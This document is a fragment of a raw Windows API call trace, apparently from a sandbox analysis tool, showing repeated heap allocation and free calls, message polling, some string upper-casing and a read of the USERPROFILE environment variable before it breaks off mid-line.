hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0253.585] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.585] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.585] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.585] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.586] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0253.586] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.586] FreeLibrary (hLibModule=0x74d40000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.586] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0253.586] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0253.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.587] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.587] CloseHandle (hObject=0x2cc) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0253.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0253.588] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0253.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0253.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0253.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0253.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0253.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0253.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa718 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa730 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa388 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0253.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0253.589] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.590] CloseHandle (hObject=0x294) returned 1 [0253.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0253.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0253.593] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0253.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0253.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0253.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0253.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0253.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0253.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0253.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0253.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa90 [0253.595] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0253.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0253.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0253.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34fae10 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0253.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0253.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420888 | out: hHeap=0x25c0000) returned 1 [0253.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0253.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0253.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0253.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0253.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0253.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0253.600] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa808 [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0253.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0253.600] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0253.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0253.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0253.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa820 [0253.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0253.601] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0253.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa790 [0253.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0253.601] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0253.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9e8 [0253.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 